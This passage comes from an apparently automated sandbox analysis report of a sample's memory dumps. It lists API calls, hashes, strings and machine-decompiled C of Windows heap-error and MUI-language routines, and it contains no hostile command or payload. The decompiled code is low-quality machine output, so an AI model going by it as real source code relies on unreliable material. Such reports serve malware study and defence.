Opcode Fuzzy Hash: e46d3f20cf305cd0d264707020df20be4e9162e48c3b996a68baec1a039c5b1f
Instruction Fuzzy Hash: E9E0E5702042416BE714DF68CC45FA7376DEF44364F014349FD0917292C235E915C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A272, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 07af3855714ad6852cbf30c07ce14119f6fce71d1e23b5470805247f93a63daf
Instruction ID: 1d1730de4e10e2b65b8d4a036dafea8c34c134e8f4e6bec9f155f18ada7e552e
Opcode Fuzzy Hash: 07af3855714ad6852cbf30c07ce14119f6fce71d1e23b5470805247f93a63daf
Instruction Fuzzy Hash: F4E0DF34244250BEC311CB698C84FCB3BA99F8A320F058159B64EDB283C234A602C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0113967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01139694

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d411464b77ca5f1664926a182fe516bcea6b3cfc81b2010e41f146d69c2450a
Instruction ID: a3142964848c32c0edf81acb4726d25ced7dceb99ff0f8a67fec9d76aa3347d6
Opcode Fuzzy Hash: 7d411464b77ca5f1664926a182fe516bcea6b3cfc81b2010e41f146d69c2450a
Instruction Fuzzy Hash: F1B09BF19064C5C6DE15D7A457087177D0477D0755F16C055D1020681F4778C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011AB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The instruction at %p referenced memory at %p., xrefs: 011AB432
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011AB476
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 011AB39B
write to, xrefs: 011AB4A6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011AB47D
*** then kb to get the faulting stack, xrefs: 011AB51C
*** A stack buffer overrun occurred in %ws:%s, xrefs: 011AB2F3
<unknown>, xrefs: 011AB27E, 011AB2D1, 011AB350, 011AB399, 011AB417, 011AB48E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011AB53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011AB305
an invalid address, %p, xrefs: 011AB4CF
Go determine why that thread has not released the critical section., xrefs: 011AB3C5
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011AB484
The resource is owned exclusively by thread %p, xrefs: 011AB374
*** enter .exr %p for the exception record, xrefs: 011AB4F1
The resource is owned shared by %d threads, xrefs: 011AB37E
The instruction at %p tried to %s , xrefs: 011AB4B6
This failed because of error %Ix., xrefs: 011AB446
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011AB2DC
*** Inpage error in %ws:%s, xrefs: 011AB418
The critical section is owned by thread %p., xrefs: 011AB3B9
a NULL pointer, xrefs: 011AB4E0
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011AB323
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011AB38F
*** enter .cxr %p for the context, xrefs: 011AB50D
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011AB314
*** Resource timeout (%p) in %ws:%s, xrefs: 011AB352
*** An Access Violation occurred in %ws:%s, xrefs: 011AB48F
read from, xrefs: 011AB4AD, 011AB4B2
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011AB3D6

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 248d6b1839c1578fce94b0f0308ab6c9160916ff4f9dc09617de32e4dcfe2258
Instruction ID: 66e545a4cb342a2d4029fdc92aec9ecf3e26d8de2969eea71d31d155a7a244dd
Opcode Fuzzy Hash: 248d6b1839c1578fce94b0f0308ab6c9160916ff4f9dc09617de32e4dcfe2258
Instruction Fuzzy Hash: 76812579A08200FFDB2EBA4BCC49D7B3F66EF56A95F818049F5062F112D3618451CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 011B1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E011B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010FB150();
				} else {
					E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x11e589c);
				E010FB150("Heap error detected at %p (heap handle %p)\n",  *0x11e58a0);
				_t27 =  *0x11e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M011B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010FB150();
				} else {
					E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E010FB150("Error code: %d - %s\n",  *0x11e5898);
				_t113 =  *0x11e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Parameter1: %p\n",  *0x11e58a4);
				}
				_t115 =  *0x11e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Parameter2: %p\n",  *0x11e58a8);
				}
				_t117 =  *0x11e58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Parameter3: %p\n",  *0x11e58ac);
				}
				_t119 =  *0x11e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11e58b4);
					E010FB150("Last known valid blocks: before - %p, after - %p\n",  *0x11e58b0);
				} else {
					_t120 =  *0x11e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010FB150();
				} else {
					E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E010FB150("Stack trace available at %p\n", 0x11e58c0);
			}

0x011b1c10
0x011b1c16
0x011b1c1e
0x011b1c3d
0x011b1c3e
0x011b1c20
0x011b1c35
0x011b1c3a
0x011b1c44
0x011b1c55
0x011b1c5a
0x011b1c65
0x011b1c67
0x00000000
0x011b1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x011b1c67
0x011b1cdc
0x011b1ce5
0x011b1d04
0x011b1d05
0x011b1ce7
0x011b1cfc
0x011b1d01
0x011b1d0b
0x011b1d17
0x011b1d1f
0x011b1d25
0x011b1d30
0x011b1d4f
0x011b1d50
0x011b1d32
0x011b1d47
0x011b1d4c
0x011b1d61
0x011b1d67
0x011b1d68
0x011b1d6e
0x011b1d79
0x011b1d98
0x011b1d99
0x011b1d7b
0x011b1d90
0x011b1d95
0x011b1daa
0x011b1db0
0x011b1db1
0x011b1db7
0x011b1dc2
0x011b1de1
0x011b1de2
0x011b1dc4
0x011b1dd9
0x011b1dde
0x011b1df3
0x011b1df9
0x011b1dfa
0x011b1e00
0x011b1e0a
0x011b1e13
0x011b1e32
0x011b1e33
0x011b1e15
0x011b1e2a
0x011b1e2f
0x011b1e39
0x011b1e4a
0x011b1e02
0x011b1e02
0x011b1e08
0x00000000
0x00000000
0x011b1e08
0x011b1e5b
0x011b1e7a
0x011b1e7b
0x011b1e5d
0x011b1e72
0x011b1e77
0x011b1e95

Strings

Stack trace available at %p, xrefs: 011B1E86
Parameter1: %p, xrefs: 011B1D5C
heap_failure_entry_corruption, xrefs: 011B1C83
Error code: %d - %s, xrefs: 011B1D12
heap_failure_cross_heap_operation, xrefs: 011B1CC2
HEAP: , xrefs: 011B1C16, 011B1C3D, 011B1D04, 011B1D4F, 011B1D98, 011B1DE1, 011B1E32, 011B1E7A
heap_failure_internal, xrefs: 011B1C6E
Last known valid blocks: before - %p, after - %p, xrefs: 011B1E45
heap_failure_multiple_entries_corruption, xrefs: 011B1C8A
heap_failure_listentry_corruption, xrefs: 011B1CD0
heap_failure_virtual_block_corruption, xrefs: 011B1C91
Heap error detected at %p (heap handle %p), xrefs: 011B1C50
Parameter3: %p, xrefs: 011B1DEE
HEAP[%wZ]: , xrefs: 011B1C30, 011B1CF7, 011B1D42, 011B1D8B, 011B1DD4, 011B1E25, 011B1E6D
heap_failure_buffer_underrun, xrefs: 011B1C9F
heap_failure_block_not_busy, xrefs: 011B1CA6
heap_failure_invalid_argument, xrefs: 011B1CAD
heap_failure_buffer_overrun, xrefs: 011B1C98
heap_failure_lfh_bitmap_mismatch, xrefs: 011B1CD7
heap_failure_unknown, xrefs: 011B1C75
heap_failure_invalid_allocation_type, xrefs: 011B1CB4
heap_failure_usage_after_free, xrefs: 011B1CBB
heap_failure_freelists_corruption, xrefs: 011B1CC9
heap_failure_generic, xrefs: 011B1C7C
Parameter2: %p, xrefs: 011B1DA5

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 1ba491f324da3bde799f681d1e504ab25f0deac8db466bdab364261c896a7813
Instruction ID: a59a199c9ae36a5aa5e0750bfcb8bfbdb3b6d9b790c20c26c487c0c1aca19bc5
Opcode Fuzzy Hash: 1ba491f324da3bde799f681d1e504ab25f0deac8db466bdab364261c896a7813
Instruction Fuzzy Hash: 9861C337511159EFD26DAB8AE4D9EA473E5FB04920B4F803EF6895F602D73498808F0B

Uniqueness

Uniqueness Score: -1.00%

Function 01103D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01103D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01101B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01101B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01101B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01101B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01101B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01114620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0113F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01141370(_t276, 0x10d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0113BB40(0,  &_v68, _t170);
									if(L011043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0113BB40(_t257,  &_v68, _t243);
								if(L011043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01141370(_t278, 0x10d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01114620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0113F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01141370(_v16, 0x10d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0113BB40(_t262,  &_v68, _t244);
								if(L011043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01141370(_t282, 0x10d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0113BB40(_t262,  &_v68, _t201);
							if(L011043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01114620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0113F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01141370(_t280, 0x10d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0113BB40(_t267,  &_v68, _t245);
							if(L011043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01141370(_t284, 0x10d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0113BB40(_t267,  &_v68, _t224);
						if(L011043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01103d3c
0x01103d42
0x01103d44
0x01103d46
0x01103d49
0x01103d4c
0x01103d4f
0x01103d52
0x01103d55
0x01103d58
0x01103d5b
0x01103d5f
0x01103d61
0x01103d66
0x01158213
0x01158218
0x01104085
0x01104088
0x0110408e
0x01104094
0x0110409a
0x011040a0
0x011040a6
0x011040a9
0x011040af
0x011040b6
0x011040bd
0x011040bd
0x01103d83
0x0115821f
0x01158229
0x01158238
0x01158238
0x0115823d
0x0115823d
0x01103da0
0x01103daf
0x01103db5
0x01103dba
0x01103dba
0x01103dd4
0x01103e94
0x01103eab
0x01103f6d
0x01103f84
0x0110406b
0x0110406b
0x0110406e
0x0110406e
0x01104070
0x01104074
0x01158351
0x01158351
0x0110407a
0x0110407f
0x0115835d
0x01158370
0x01158377
0x01158379
0x0115837c
0x0115837c
0x0115835d
0x00000000
0x0110407f
0x01103f8a
0x01103f8d
0x01103f90
0x01103f95
0x0115830d
0x0115830f
0x01103f9b
0x01103fac
0x01103fae
0x01103fb1
0x01103fb1
0x01103fb6
0x01158317
0x0115831a
0x00000000
0x01103fbc
0x01103fc1
0x01103fc9
0x01103fd7
0x01103fda
0x01103fdd
0x01104021
0x01104021
0x01104029
0x01104030
0x01104044
0x01104046
0x01104046
0x01104044
0x01104049
0x01158327
0x01158334
0x01158339
0x0115833c
0x0110404f
0x0110404f
0x0110404f
0x01104051
0x01104056
0x01104063
0x01104063
0x01104068
0x00000000
0x01104068
0x01103fdf
0x01103fe2
0x01103fe4
0x01103fe7
0x01103fef
0x01104003
0x01104005
0x01104005
0x0110400c
0x01104013
0x01104016
0x01104017
0x0110401b
0x0110401e
0x00000000
0x0110401e
0x01103fb6
0x01103eb1
0x01103eb4
0x01103eb7
0x01103ebc
0x011582a9
0x011582ab
0x01103ec2
0x01103ed3
0x01103ed5
0x01103ed8
0x01103ed8
0x01103edd
0x011582b3
0x011582b6
0x00000000
0x01103ee3
0x01103ee8
0x01103eed
0x01103ef0
0x01103ef3
0x01103f02
0x01103f05
0x01103f08
0x011582c0
0x011582c3
0x011582c5
0x011582c8
0x011582d0
0x011582e4
0x011582e6
0x011582e6
0x011582ed
0x011582f4
0x011582f7
0x011582f8
0x011582fc
0x011582ff
0x011582ff
0x01103f0e
0x01103f11
0x01103f16
0x01103f1d
0x01103f31
0x01158307
0x01158307
0x01103f31
0x01103f39
0x01103f48
0x01103f4d
0x01103f50
0x01103f50
0x01103f53
0x01103f58
0x01103f65
0x01103f65
0x01103f6a
0x00000000
0x01103f6a
0x01103edd
0x01103dda
0x01103ddd
0x01103de0
0x01103de5
0x01158245
0x01103deb
0x01103df7
0x01103dfc
0x01103dfe
0x01103e01
0x01103e01
0x01103e06
0x0115824d
0x0115824f
0x01158254
0x00000000
0x01103e0c
0x01103e11
0x01103e16
0x01103e19
0x01103e29
0x01103e2c
0x01103e2f
0x0115825c
0x0115825f
0x01158261
0x01158264
0x0115826c
0x01158280
0x01158282
0x01158282
0x01158289
0x01158290
0x01158293
0x01158294
0x01158298
0x0115829b
0x0115829b
0x01103e35
0x01103e38
0x01103e3d
0x01103e44
0x01103e58
0x011582a3
0x011582a3
0x01103e58
0x01103e60
0x01103e6f
0x01103e74
0x01103e77
0x01103e77
0x01103e7a
0x01103e7f
0x01103e8c
0x01103e8c
0x01103e91
0x00000000
0x01103e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01103E97
Kernel-MUI-Number-Allowed, xrefs: 01103D8C
WindowsExcludedProcs, xrefs: 01103D6F
Kernel-MUI-Language-Allowed, xrefs: 01103DC0
Kernel-MUI-Language-SKU, xrefs: 01103F70

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 0396abeca19071c4be3dd8413550610861552f03c8521d9e546f32a167eac80e
Instruction ID: 999f127e11b342b164223f22057229b9562e9ba585f2429fa5abe47b33175c95
Opcode Fuzzy Hash: 0396abeca19071c4be3dd8413550610861552f03c8521d9e546f32a167eac80e
Instruction Fuzzy Hash: C2F18072D00619EFCB1ADF99C980AEEBBB9FF48650F15006AE915F7650E7749E00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01128E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01128E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
